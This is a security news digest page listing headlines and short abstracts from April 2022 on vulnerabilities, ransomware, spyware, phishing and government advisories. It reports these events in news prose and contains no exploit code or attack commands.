Abstract The "hotpatch" released by Amazon Web Services (AWS) in response to the Log4Shell vulnerabilities could be leveraged for container escape and privilege escalation, allowing an attacker to seize control of the underlying host. "Aside from containers, unprivileged processes can also exploit the patch to escalate privileges and gain root code execution," Palo Alto Networks Unit 42 researcher Yuval Avrahami said in a report published this week. The issues — CVE-2021-3100, CVE-2021-3101, CVE-2022-0070, and CVE-2022-0071 (CVSS scores: 8.8) — affect the hotfix solutions shipped by AWS, and stem from the fact that they are designed to search for Java processes and patch them against the Log4j flaw on the fly but without ensuring that the new Java processes are run within the restrictions imposed on the container. "Any process running a binary named 'java' – inside or outside of a container – is considered a candidate for the hot patch,"

The Hacker News

April 21, 2022 – Phishing

Cybercriminals Deliver IRS Tax Scams & Phishing Campaigns By Mimicking Government Vendors Full Text

Abstract Threat intelligence firm Resecurity details how crooks are delivering IRS tax scams and phishing attacks posing as government vendors. Cybercriminals are leveraging advanced tactics in their phishing-kits granting them a high delivery success rate...

Security Affairs

April 21, 2022 – Vulnerabilities

QNAP asks users to mitigate critical Apache HTTP Server bugs Full Text

Abstract QNAP has asked customers to apply mitigation measures to block attempts to exploit Apache HTTP Server security vulnerabilities impacting their network-attached storage (NAS) devices.

BleepingComputer

April 21, 2022 – Criminals

Cybercriminals Deliver IRS Tax Scams & Phishing Campaigns By Mimicking Government Vendors Full Text

Abstract Cybercriminals purposely choose specific times when all of us are busy with taxes and preparing for holidays (e.g., Easter); that's why you need to be especially careful during these times.

Security Affairs

April 21, 2022 – Vulnerabilities

Unpatched Bug in RainLoop Webmail Could Give Hackers Access to all Emails Full Text

Abstract An unpatched high-severity security flaw has been disclosed in the open-source RainLoop web-based email client that could be weaponized to siphon emails from victims' inboxes. "The code vulnerability [...] can be easily exploited by an attacker by sending a malicious email to a victim that uses RainLoop as a mail client," SonarSource security researcher Simon Scannell said in a report published this week. "When the email is viewed by the victim, the attacker gains full control over the session of the victim and can steal any of their emails, including those that contain highly sensitive information such as passwords, documents, and password reset links." Tracked as CVE-2022-29360, the flaw relates to a stored cross-site-scripting (XSS) vulnerability impacting the latest version of RainLoop (v1.16.0) that was released on May 7, 2021. Stored XSS flaws, also called persistent XSS, occur when a malicious script is injected directly into a target web applic

The Hacker News

April 21, 2022 – Vulnerabilities

Static SSH host key in Cisco Umbrella allows stealing admin credentials Full Text

Abstract Cisco addressed a high severity vulnerability in the Cisco Umbrella Virtual Appliance (VA) that could allow stealing admin credentials. Cisco addressed a high severity vulnerability in the Cisco Umbrella Virtual Appliance (VA), tracked as CVE-2022-20773,...

Security Affairs

April 21, 2022 – Vulnerabilities

Critical bug in Android could allow access to users’ media files Full Text

Abstract Security analysts have found that Android devices running on Qualcomm and MediaTek chipsets were vulnerable to remote code execution due to a flaw in the implementation of the Apple Lossless Audio Codec (ALAC).

BleepingComputer

April 21, 2022 – Government

Ukraine Ramps Up Cyber Defenses to Slow Surge in Attacks Full Text

Abstract Ukraine is now issuing physical security keys to as many government agencies as possible, said Oleksandr Potii, deputy chief of the State Service of Special Communication and Information Protection.

Bloomberg Quint

April 21, 2022 – Vulnerabilities

Critical Chipset Bugs Open Millions of Android Devices to Remote Spying Full Text

Abstract Three security vulnerabilities have been disclosed in the audio decoders of Qualcomm and MediaTek chips that, if left unresolved, could allow an adversary to remotely gain access to media and audio conversations from affected mobile devices. According to Israeli cybersecurity company Check Point, the issues could be used as a launchpad to carry out remote code execution (RCE) attacks simply by sending a specially crafted audio file. "The impact of an RCE vulnerability can range from malware execution to an attacker gaining control over a user's multimedia data, including streaming from a compromised machine's camera," the researchers said in a report shared with The Hacker News. "In addition, an unprivileged Android app could use these vulnerabilities to escalate its privileges and gain access to media data and user conversations." The vulnerabilities are rooted in an audio coding format originally developed and open-sourced by Apple in 2011. Called t

The Hacker News

April 21, 2022 – Vulnerabilities

CVE-2022-20685 flaw in the Modbus preprocessor of Snort makes it unusable Full Text

Abstract CVE-2022-20685 flaw in the Modbus preprocessor of the Snort detection engine could trigger a DoS condition and make it ineffective against malicious traffic. Snort is a free open source network intrusion detection system (IDS)...

Security Affairs

April 21, 2022 – Attack

GitHub restores popular Python repo hit by bogus DMCA takedown Full Text

Abstract Yesterday, following a DMCA complaint, GitHub took down a repository that hosts the official SymPy project documentation website. It turns out the DMCA notice filed by HackerRank's representatives was sent out in error and generated much backlash from the open source community. The DMCA notice has since been rescinded.

BleepingComputer

April 21, 2022 – Criminals

REvil’s Tor Servers are Active Again Full Text

Abstract REvil ransomware’s servers in the Tor network are active again after months of inactivity. At present, these servers are redirecting users to a new operation that is believed to have started in mid-December 2021.

Cyware Alerts - Hacker News

April 21, 2022 – Ransomware

New Incident Report Reveals How Hive Ransomware Targets Organizations Full Text

Abstract A recent Hive ransomware attack carried out by an affiliate involved the exploitation of "ProxyShell" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network. "The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise," Varonis security researcher, Nadav Ovadia, said in a post-mortem analysis of the incident. Hive, which was first observed in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks. ProxyShell — tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 — involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker

The Hacker News

April 21, 2022 – Government

US, Australia, Canada, New Zealand, and the UK warn of Russia-linked threat actors’ attacks Full Text

Abstract Cybersecurity agencies of the Five Eyes intelligence alliance warn of cyberattacks conducted by Russia-linked threat actors on critical infrastructure. Cybersecurity agencies of the Five Eyes intelligence alliance (United States, Australia, Canada,...

Security Affairs

April 21, 2022 – Vulnerabilities

Cisco Umbrella default SSH key allows theft of admin credentials Full Text

Abstract Cisco has released security updates to address a high severity vulnerability in the Cisco Umbrella Virtual Appliance (VA), allowing unauthenticated attackers to steal admin credentials remotely.

BleepingComputer

April 21, 2022 – Malware

Freely-Distributed Ginzo Stealer Malware Pilfers Browser Data, Discord Tokens, and Crypto Wallets Full Text

Abstract Ginzo stealer is obfuscated with ConfuserEx, resulting in error messages when trying to decompile the code. That is because the type initializer .cctor decrypts the actual code on the fly. It also initializes data required for string decryption.

G-Data Security Blog

April 21, 2022 – Government

FBI: BlackCat ransomware breached at least 60 entities worldwide Full Text

Abstract The Federal Bureau of Investigation (FBI) says the BlackCat ransomware gang, also known as ALPHV, has breached the networks of at least 60 organizations worldwide between November 2021 and March 2022.

BleepingComputer

April 21, 2022 – Government

Australia: AUSTRAC outlines how to spot ransomware and detect abuse of digital currencies Full Text

Abstract Australia's financial intelligence and regulatory body Austrac has released two financial crime guides to help businesses detect and prevent criminal abuse of digital currencies and ransomware.

ZDNet

April 21, 2022 – General

Breaches by the numbers: Why adapting to regional challenges is imperative Full Text

Abstract According to a new Forrester survey, 63% of organizations were breached in the past year, 4% more than the year before. In the past 12 months, organizations faced an average of three breaches.

ZDNet

April 20, 2022 – Government

Five Eyes Nations Warn of Russian Cyber Attacks Against Critical Infrastructure Full Text

Abstract The Five Eyes nations have released a joint cybersecurity advisory warning of increased malicious attacks from Russian state-sponsored actors and criminal groups targeting critical infrastructure organizations amidst the ongoing military siege on Ukraine. "Evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks," authorities from Australia, Canada, New Zealand, the U.K., and the U.S. said. "Russia's invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. This activity may occur as a response to the unprecedented economic costs imposed on Russia as well as material support provided by the United States and U.S. allies and partners." The advisory follows another alert from the U.S. government cautioning of nation-state actors deploying specialized malware to maintain access to industrial control systems (ICS) and supervisory control an

The Hacker News

April 20, 2022 – Criminals

REvil’s TOR sites come alive to redirect to new ransomware operation Full Text

Abstract REvil ransomware's servers in the TOR network are back up after months of inactivity and redirect to a new operation that appears to have been active since at least mid-December last year.

BleepingComputer

April 20, 2022 – Malware

Inno Stealer - Fake Windows 11 Upgrade Spreads Infostealer Full Text

Abstract The new infostealer malware targets various web browsers and crypto wallets such as Chrome, Brave, Comodo, Opera, Vivaldi, Edge, 360 Browser, GeroWallet, BraveWallet, and GuildWallet.

Cyware Alerts - Hacker News

April 20, 2022 – Vulnerabilities

Google Project Zero Detects a Record Number of Zero-Day Exploits in 2021 Full Text

Abstract Google Project Zero called 2021 a "record year for in-the-wild 0-days," as 58 security vulnerabilities were detected and disclosed during the course of the year. The development marks more than a two-fold jump from the previous maximum when 28 0-day exploits were tracked in 2015. In contrast, only 25 0-day exploits were detected in 2020. "The large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits," Google Project Zero security researcher Maddie Stone said. "Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces," Stone added. The tech giant's in-house security team characterized the exploits as similar to previous and publicly known vulnerabilities, with only two of them markedly different for the technical sophistication and use of logic bugs to escape the sandbox. B

The Hacker News

April 20, 2022 – APT

Russian Gamaredon APT continues to target Ukraine Full Text

Abstract Russia-linked threat actor Gamaredon targets Ukraine with new variants of the custom Pterodo backdoor. Russia-linked Gamaredon APT group (a.k.a. Armageddon, Primitive Bear, and ACTINIUM) continues to target Ukraine and it is using new variants...

Security Affairs

April 20, 2022 – Breach

Microsoft Exchange servers hacked to deploy Hive ransomware Full Text

Abstract A Hive ransomware affiliate has been targeting Microsoft Exchange servers vulnerable to ProxyShell security issues to deploy various backdoors, including Cobalt Strike beacon.

BleepingComputer

April 20, 2022 – Ransomware

Night Sky Ransomware’s Ride From Dusk Till Dawn Full Text

Abstract A recent report by Vedere Labs provides several details about Night Sky, whose samples were first spotted in January during a short campaign that targeted two victims from Bangladesh and Japan. 

Cyware Alerts - Hacker News

April 20, 2022 – Vulnerabilities

Researchers Detail Bug That Could Paralyze Snort Intrusion Detection System Full Text

Abstract Details have emerged about a now-patched security vulnerability in the Snort intrusion detection and prevention system that could trigger a denial-of-service (DoS) condition and render it powerless against malicious traffic. Tracked as CVE-2022-20685, the vulnerability is rated 7.5 for severity and resides in the Modbus preprocessor of the Snort detection engine. It affects all open-source Snort project releases earlier than 2.9.19 as well as version 3.1.11.0. Maintained by Cisco, Snort is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS) that offers real-time network traffic analysis to spot potential signs of malicious activity based on predefined rules. "The vulnerability, CVE-2022-20685, is an integer-overflow issue that can cause the Snort Modbus OT preprocessor to enter an infinite while loop," Uri Katz, a security researcher with Claroty, said in a report published last week. "A successful exploit keeps Snort from p

The Hacker News

April 20, 2022 – Breach

Anonymous hacked other Russian organizations, some of the breaches could be severe Full Text

Abstract The Anonymous collective and affiliate groups have intensified their attacks and claimed to have breached multiple organizations. Anonymous and groups linked to the famous collective continue to target Russian organizations; the hacktivists are breaching...

Security Affairs

April 20, 2022 – Government

FBI warns of ransomware attacks targeting US agriculture sector Full Text

Abstract The US Federal Bureau of Investigation (FBI) warned Food and Agriculture (FA) sector organizations today of an increased risk that ransomware gangs "may be more likely" to attack them during the harvest and planting seasons.

BleepingComputer

April 20, 2022 – Botnet

BotenaGo’s New Avatar Targets Lilin DVR Devices Full Text

Abstract In October 2021, the source code of BotenaGo was leaked, leading to the creation of newer variants based on the original. Since then, researchers have observed various variants of BotenaGo.

Cyware Alerts - Hacker News

April 20, 2022 – Education

[eBook] The Ultimate Security for Management Presentation Template Full Text

Abstract Are you a CISO, CIO, or IT Director? In your role, you're responsible for breach protection – which means you oversee and govern the process of designing, building, maintaining, and continuously enhancing your organization's security program. But getting buy-in from leadership can be difficult when they are a non-technical audience. On top of managing your organization's breach protection activity 24/7, you have to find time to figure out how to effectively articulate the risks, potential impacts, and appropriate steps necessary in a way that will convince leadership to invest in the resources required to keep your organization safe. Compounding this is the fact that, while you are focused on things like malware, exploits, and network traffic – your leadership is primarily concerned with operational loss and calculated risk. How do you bridge the gap and help leadership understand your priorities and your team's business impact? You must identify the security i

The Hacker News

April 20, 2022 – Government

CISA adds Windows Print Spooler to its Known Exploited Vulnerabilities Catalog Full Text

Abstract US Cybersecurity and Infrastructure Security Agency (CISA) adds a Windows Print Spooler vulnerability to its Known Exploited Vulnerabilities Catalog. The Cybersecurity and Infrastructure Security Agency (CISA) added the Windows Print Spooler flaw, tracked as CVE-2022-22718,...

Security Affairs

April 20, 2022 – Government

US and allies warn of Russian hacking threat to critical infrastructure Full Text

Abstract Today, Five Eyes cybersecurity authorities warned critical infrastructure network defenders of an increased risk that Russia-backed hacking groups could target organizations within and outside Ukraine's borders.

BleepingComputer

April 20, 2022 – Government

FBI Warns of Ransomware Attacks on Farming Co-ops During Planting, Harvest Seasons Full Text

Abstract While some of the incidents resulted in only administrative operations getting disrupted, others affected production. In some of the attacks reported in September and October 2021, the victim had to completely shut down production.

Security Week

April 20, 2022 – Malware

New BotenaGo variant specifically targets Lilin security camera DVR devices Full Text

Abstract Researchers spotted a new variant of the BotenaGo botnet malware that is considered highly evasive and has a zero-detection rate. The BotenaGo botnet was first spotted in November 2021 by researchers at AT&T; the malicious code leverages...

Security Affairs

April 20, 2022 – Breach

Okta: Lapsus$ breach lasted only 25 minutes, hit 2 customers Full Text

Abstract Identity and access management firm Okta says an investigation into the January Lapsus$ breach concluded the incident's impact was significantly smaller than expected.

BleepingComputer

April 20, 2022 – Business

ThreatLocker Scores $100M in Funding Led by General Atlantic, Zeroes in on $1B Unicorn Valuation Full Text

Abstract ThreatLocker, which provides zero trust policy-driven security for endpoints, has scored $100 million in Series C funding led by private equity powerhouse and growth equity investor General Atlantic.

CRN

April 20, 2022 – Vulnerabilities

QNAP users are recommended to disable UPnP port forwarding on routers Full Text

Abstract QNAP urges customers to disable Universal Plug and Play (UPnP) port forwarding on their routers to secure their NAS devices. Taiwanese vendor QNAP urges customers to disable Universal Plug and Play (UPnP) port forwarding on their routers to protect...

Security Affairs

April 20, 2022 – Vulnerabilities

Microsoft Defender flags Google Chrome updates as suspicious Full Text

Abstract Microsoft Defender for Endpoint has been tagging Google Chrome updates delivered via Google Update as suspicious activity due to a false positive issue.

BleepingComputer

April 20, 2022 – Phishing

Watch out for Ukraine donation scammers in Twitter replies Full Text

Abstract The invasion of Ukraine has been a money-making opportunity for scammers since the moment it began: Fake donation sites, bogus Red Cross portals, phishing pages, the works.

Malwarebytes Labs

April 20, 2022 – Attack

Russian state hackers hit Ukraine with new malware variants Full Text

Abstract Threat analysts report the activity of the Russian state-sponsored threat group known as Gamaredon (Armageddon, Shuckworm), is still notably active in Ukrainian computer networks.

BleepingComputer

April 20, 2022 – General

Cyber innovation is the need of the hour to help organizations adopt new security technologies Full Text

Abstract By leveraging automation technologies, security teams can facilitate the coordination and execution of different security processes among different security functions and across their technology stack.

Banking and Finance Post

April 20, 2022 – Vulnerabilities

Amazon Web Services fixes container escape in Log4Shell hotfix Full Text

Abstract Amazon Web Services (AWS) has fixed four security issues in its hot patch from December that addressed the critical Log4Shell vulnerability (CVE-2021-44228) affecting cloud or on-premise environments running Java applications with a vulnerable version of the Log4j logging library or containers.

BleepingComputer

April 20, 2022 – Education

Why you shouldn’t automate your VirusTotal uploads Full Text

Abstract While there may be an occasional need to upload a file to VirusTotal, experts suggest not automating this procedure. Rather, only use it when you have no other methods of checking whether an attachment is safe to open.

Malwarebytes Labs

April 20, 2022 – Attack

Shuckworm Espionage Group Continues Pterodo Backdoor Campaign Against Ukraine Full Text

Abstract The Russia-linked Shuckworm (aka Gamaredon) group is continually refining its malware and often deploying multiple payloads to maximize the chances of maintaining a persistent presence on targeted networks.

Symantec

April 19, 2022 – Breach

Okta Says Security Breach by Lapsus$ Hackers Impacted Only Two of Its Customers Full Text

Abstract Identity and access management provider Okta on Tuesday said it concluded its probe into the breach of a third-party vendor in late January 2022 by the LAPSUS$ extortionist gang. Stating that the "impact of the incident was significantly less than the maximum potential impact" the company had previously shared last month, Okta said the intrusion impacted only two customer tenants, down from 366 as was initially assumed. The security event took place on January 21 when the LAPSUS$ hacking group gained unauthorized remote access to a workstation belonging to a Sitel support engineer. But it only became public knowledge nearly two months later when the adversary posted screenshots of Okta's internal systems on their Telegram channel. In addition to accessing two active customer tenants within the SuperUser application — which is used to perform basic management functions — the hacker group is said to have viewed limited additional information in other applicatio

The Hacker News

April 19, 2022 – Vulnerabilities

Hackers Exploiting Recently Reported Windows Print Spooler Vulnerability in the Wild Full Text

Abstract A security flaw in the Windows Print Spooler component that was patched by Microsoft in February is being actively exploited in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned. To that end, the agency has added the shortcoming to its Known Exploited Vulnerabilities Catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to address the issues by May 10, 2022. Tracked as CVE-2022-22718 (CVSS score: 7.8), the security vulnerability is one among the four privilege escalation flaws in the Print Spooler that Microsoft resolved as part of its Patch Tuesday updates on February 8, 2022. It's worth noting that the Redmond-based tech giant has remediated a number of Print Spooler flaws since the critical PrintNightmare remote code execution vulnerability came to light last year, including 15 elevation of privilege vulnerabilities in April 2022. Specifics about the nature of the attacks and the identity of the threat actors that m

The Hacker News

April 19, 2022 – General

CISA warns of attackers now exploiting Windows Print Spooler bug Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has added three new security flaws to its list of actively exploited bugs, including a local privilege escalation bug in the Windows Print Spooler.

BleepingComputer

April 19, 2022 – Attack

Attacks Against DeFi Protocols Surge Full Text

Abstract Last year, more than $3 billion worth of digital assets were stolen. In Q1 2022, over $1.3 billion has already been stolen, indicating that the path taken by cybercriminals is even more aggressive this year.

Cyware Alerts - Hacker News

April 19, 2022 – Vulnerabilities

New Lenovo UEFI Firmware Vulnerabilities Affect Millions of Laptops Full Text

Abstract Three high-impact Unified Extensible Firmware Interface (UEFI) security vulnerabilities have been discovered impacting various Lenovo consumer laptop models, enabling malicious actors to deploy and execute firmware implants on the affected devices. Tracked as CVE-2021-3970, CVE-2021-3971, and CVE-2021-3972, the latter two "affect firmware drivers originally meant to be used only during the manufacturing process of Lenovo consumer notebooks," ESET researcher Martin Smolár said in a report published today. "Unfortunately, they were mistakenly included also in the production BIOS images without being properly deactivated," Smolár added. Successful exploitation of the flaws could permit an attacker to disable SPI flash protections or Secure Boot, effectively granting the adversary the ability to install persistent malware that can survive system reboots. CVE-2021-3970, on the other hand, relates to a case of memory corruption in the System Management Mode (SMM

The Hacker News

April 19, 2022 – Vulnerabilities

ESET warns of three flaws that affect over 100 Lenovo notebook models Full Text

Abstract Lenovo warns of vulnerabilities in its Unified Extensible Firmware Interface (UEFI) shipped with at least 100 notebook models. Lenovo has published a security advisory to warn customers of vulnerabilities that affect its Unified Extensible Firmware...

Security Affairs

April 19, 2022 – Education

Protect Your Executives’ Cybersecurity Amidst Global Cyberwar Full Text

Abstract In this time of unprecedented cyberwar, organizations must protect the personal digital lives of their executives in order to reduce the company’s risk of direct or collateral damage.

Threatpost

April 19, 2022 – Botnet

Emotet botnet switches to 64-bit modules, increases activity Full Text

Abstract The Emotet malware is having a burst in distribution and is likely to soon switch to new payloads that are currently detected by fewer antivirus engines.

BleepingComputer

April 19, 2022 – Malware

New SolarMarker Variant with Improved Evasion Tactics Full Text

Abstract SolarMarker operators were observed using signed files, obfuscated PowerShell scripts, large files, and impersonation of legitimate software installers to stay undetected.

Cyware Alerts - Hacker News

April 19, 2022 – Attack

Experts Uncover Spyware Attacks Against Catalan Politicians and Activists Full Text

Abstract A previously unknown zero-click exploit in Apple's iMessage was used to install mercenary spyware from NSO Group and Candiru against at least 65 individuals as part of a "multi-year clandestine operation." "Victims included Members of the European Parliament, Catalan Presidents, legislators, jurists, and members of civil society organizations," the University of Toronto's Citizen Lab said in a new report. "Family members were also infected in some cases." Of the 65 individuals, 63 were targeted with Pegasus and four others were infected with Candiru, with iPhones belonging to at least two compromised with both. The incidents are said to have mostly occurred between 2017 and 2020. The attacks involved the weaponization of an iOS exploit dubbed HOMAGE that made it possible to penetrate the devices running versions prior to iOS 13.2, which was released on October 28, 2019. It's worth noting that the latest version of iOS is iOS 15.4.1.

The Hacker News

April 19, 2022 – Ransomware

Kaspersky releases a free decryptor for Yanluowang ransomware Full Text

Abstract Kaspersky discovered a flaw in the encryption process of the Yanluowang ransomware that allows victims to recover their files for free. Researchers from Kaspersky discovered a vulnerability in the encryption process of the Yanluowang ransomware that...

Security Affairs

April 19, 2022 – Vulnerabilities

QNAP urges customers to disable UPnP port forwarding on routers Full Text

Abstract Taiwanese hardware vendor QNAP urged customers on Monday to disable Universal Plug and Play (UPnP) port forwarding on their routers to prevent exposing their network-attached storage (NAS) devices to attacks from the Internet.

BleepingComputer

April 19, 2022 – General

Banking, Crypto, and Other Scams Muddy the Cyberspace Full Text

Abstract In 2021, approximately 20,000 people fell victim to RAT scams, as per a report by the U.K's Action Fraud. Collectively, they lost $75 million. The U.S. lost around $2.4 billion to BEC scams in 2021, a 33% increase from 2020.

Cyware Alerts - Hacker News

April 19, 2022 – Privacy

NSO Group Pegasus spyware leverages new zero-click iPhone exploit in recent attacks Full Text

Abstract Researchers reported that threat actors leveraged a new zero-click iMessage exploit to install NSO Group Pegasus on iPhones belonging to Catalans. Researchers from Citizen Lab have published a report detailing the use of a new zero-click iMessage...

Security Affairs

April 19, 2022 – Vulnerabilities

Microsoft disables SMB1 by default for Windows 11 Home Insiders Full Text

Abstract Microsoft announced today that the 30-year-old SMBv1 file-sharing protocol is now disabled by default on Windows systems running the latest Windows 11 Home Dev channel builds, the last editions of Windows or Windows Server that still came with SMBv1 enabled.

BleepingComputer

April 19, 2022 – Attack

New IcedID Malware Campaign Targets Ukrainian Government Full Text

Abstract The targeted intrusions are a part of hostile activities against the nation since the year started. As per CERT-UA, the country has suffered 362 cyberattacks since the invasion.

Cyware Alerts - Hacker News

April 19, 2022 – Malware

New SolarMarker variant upgrades evasion abilities to avoid detection Full Text

Abstract Researchers disclosed a new variant of the SolarMarker malware that implements new techniques to avoid detection. Cybersecurity researchers from Palo Alto Networks disclosed a new version of the SolarMarker malware that implements new features to avoid...

Security Affairs

April 19, 2022 – Solution

Real-time voice concealment algorithm blocks microphone spying Full Text

Abstract Columbia University researchers have developed a novel algorithm that can block rogue audio eavesdropping via microphones in smartphones, voice assistants, and IoTs in general.

BleepingComputer

April 19, 2022 – Privacy

Watchdog warned UK government of spyware infections inside 10 Downing Street Full Text

Abstract "We confirm that in 2020 and 2021 we observed and notified the government of the United Kingdom of multiple suspected instances of Pegasus spyware infections within official UK networks," Citizen Lab said in a blog post.

Reuters

April 19, 2022 – Criminals

Crooks steal $182 million from Beanstalk DeFi platform Full Text

Abstract Credit-based stablecoin protocol Beanstalk discloses a security breach that resulted in the loss of all of its $182 million. The decentralized, credit-based finance system Beanstalk suffered a security breach that resulted in financial losses...

Security Affairs

April 19, 2022 – Breach

GitHub notifies owners of private repos stolen using OAuth tokens Full Text

Abstract GitHub says it notified all organizations believed to have had data stolen from their private repositories by attackers abusing compromised OAuth user tokens issued to Heroku and Travis-CI.

BleepingComputer

April 19, 2022 – Vulnerabilities

Google fixes Chrome zero day being used in exploits in the wild Full Text

Abstract Google hasn't revealed any details about it besides that it was a type confusion in Chrome's V8 JavaScript engine. "Google is aware that an exploit for CVE-2022-1364 exists in the wild," the company says.

ZDNet

April 19, 2022 – Education

How to protect your ADFS from password spraying attacks Full Text

Abstract Microsoft recommends a multi-tiered approach for securing your ADFS environment from password attacks. Learn how Specops can fill in the gaps to add further protection against password sprays and other password attacks.

BleepingComputer

April 19, 2022 – Ransomware

Night Sky: A Short-Lived Threat from a Long-Lived Threat Actor Full Text

Abstract Night Sky was discovered to be a fork of a ransomware family called Rook, which was itself derived from the leaked source code of Babuk and deployed by the same threat actor that used LockFile and AtomSilo, which share the same decryption tool.

Forescout

April 19, 2022 – Malware

New stealthy BotenaGo malware variant targets DVR devices Full Text

Abstract Threat analysts have spotted a new variant of the BotenaGo botnet malware, and it's the stealthiest seen so far, running undetected by any anti-virus engine.

BleepingComputer

April 19, 2022 – Ransomware

Conti Ransomware’s Toll on the Healthcare Industry – Krebs on Security Full Text

Abstract According to recently revealed information, Conti has launched more than 200 attacks against hospitals and other healthcare facilities since first surfacing in 2018 under its earlier name, “Ryuk.”

Krebs on Security

April 19, 2022 – Vulnerabilities

Lenovo UEFI firmware driver bugs affect over 100 laptop models Full Text

Abstract Lenovo has published a security advisory on vulnerabilities that impact its Unified Extensible Firmware Interface (UEFI) loaded on at least 100 of its laptop models.

BleepingComputer

April 19, 2022 – Outage

WH Smith Subsidiary Funky Pigeon Halts All Customer Orders After Security Incident Full Text

Abstract London Stock Exchange-listed WH Smith issued a statement to the market admitting Funky Pigeon was "subject to a cyber security incident affecting part of its systems on Thursday 14 April 2022."

The Register

April 19, 2022 – Phishing

LinkedIn brand takes lead as most impersonated in phishing attacks Full Text

Abstract Security researchers are warning that LinkedIn has become the most spoofed brand in phishing attacks, accounting for more than 52% of all such incidents at a global level.

BleepingComputer

April 18, 2022 – Government

FBI, U.S. Treasury and CISA Warn of North Korean Hackers Targeting Blockchain Companies Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Federal Bureau of Investigation (FBI) and the Treasury Department, warned of a new set of ongoing cyber attacks carried out by the Lazarus Group targeting blockchain companies. Calling the activity cluster TraderTraitor, the infiltrations involve the North Korean state-sponsored advanced persistent threat (APT) actor striking entities operating in the Web3.0 industry since at least 2020. Targeted organizations include cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs). The attack chains commence with the threat actor reaching out to victims via different communication platforms to lure them into downloading weaponized cryptocurrency apps for Windows and macOS, subse

The Hacker News

April 18, 2022 – Breach

GitHub Notifies Victims Whose Private Data Was Accessed Using OAuth Tokens Full Text

Abstract GitHub on Monday noted that it had notified all victims of an attack campaign, which involved an unauthorized party downloading private repository contents by taking advantage of third-party OAuth user tokens maintained by Heroku and Travis CI. "Customers should also continue to monitor Heroku and Travis CI for updates on their own investigations into the affected OAuth applications," the company said in an updated post. The incident originally came to light on April 12 when GitHub uncovered signs that a malicious actor had leveraged the stolen OAuth user tokens issued to Heroku and Travis-CI to download data from dozens of organizations, including NPM. The Microsoft-owned platform also said that it will alert customers promptly should the ongoing investigation identify additional victims. Additionally, it cautioned that the adversary may also be digging into the repositories for secrets that could be used in other attacks. Heroku, which has pulled support for GitHu

The Hacker News

April 18, 2022 – Breach

Beanstalk DeFi platform loses $182 million in flash-loan attack Full Text

Abstract The decentralized, credit-based finance system Beanstalk disclosed on Sunday that it suffered a security breach that resulted in financial losses of $182 million, the attacker stealing $80 million in crypto assets.

BleepingComputer

April 18, 2022 – Cryptocurrency

US warns of Lazarus hackers using malicious cryptocurrency apps Full Text

Abstract CISA, the FBI, and the US Treasury Department warned today that the North Korean Lazarus hacking group is targeting organizations in the cryptocurrency and blockchain industries with trojanized cryptocurrency applications.

BleepingComputer

April 18, 2022 – Criminals

Conti’s Extended Connections with Karakurt Revealed Full Text

Abstract Researchers were able to gain access to an internal Conti VPS server, with the credentials of a user, allegedly the leader of the cybercrime enterprise. This resulted in several revelations about its connection with other groups.

Cyware Alerts - Hacker News

April 18, 2022 – Criminals

Researchers Share In-Depth Analysis of PYSA Ransomware Group Full Text

Abstract An 18-month-long analysis of the PYSA ransomware operation has revealed that the cybercrime cartel followed a five-stage software development cycle from August 2020, with the malware authors prioritizing features to improve the efficiency of its workflows. This included a user-friendly tool like a full-text search engine to facilitate the extraction of metadata and enable the threat actors to find and access victim information quickly. "The group is known to carefully research high-value targets before launching its attacks, compromising enterprise systems and forcing organizations to pay large ransoms to restore their data," Swiss cybersecurity company PRODAFT said in an exhaustive report published last week. PYSA, short for "Protect Your System, Amigo" and a successor of the Mespinoza ransomware, was first observed in December 2019 and has emerged as the third most prevalent ransomware strain detected during the fourth quarter of 2021. Since September 2020,

The Hacker News

April 18, 2022 – Policy and Law

Call for Papers: Cybersecurity Law and Policy Scholars Conference 2022 Full Text

Abstract The second annual Cybersecurity Law and Policy Scholars Conference (CLPSC) will take place at the University of Minnesota Law School on September 23-24, 2022.

Lawfare

April 18, 2022 – Criminals

Experts spotted Industrial Spy, a new stolen data marketplace Full Text

Abstract A new marketplace named Industrial Spy that focuses on the sale of stolen data appeared in the threat landscape. MalwareHunterTeam and Bleeping Computer reported the birth of a new marketplace called Industrial Spy that sells stolen data and offers...

Security Affairs

April 18, 2022 – Hacker

Cyberattackers Put the Pedal to the Medal: Podcast Full Text

Abstract Fortinet’s Derek Manky discusses the exponential increase in the speed that attackers weaponize fresh vulnerabilities, where botnets and offensive automation fit in, and the ramifications for security teams.

Threatpost

April 18, 2022 – Ransomware

Free decryptor released for Yanluowang ransomware victims Full Text

Abstract Kaspersky today revealed it found a vulnerability in Yanluowang ransomware's encryption algorithm, which makes it possible to recover files it encrypts.

BleepingComputer

April 18, 2022 – Criminals

Lazarus Eyes Chemical Sector in South Korea Full Text

Abstract Lazarus, the North Korea-linked APT group, is targeting organizations operating in the chemical sector in South Korea. The campaign seems to be a continuation of Operation Dream Job spotted in August 2020.

Cyware Alerts - Hacker News

April 18, 2022 – General

Benchmarking Linux Security – Latest Research Findings Full Text

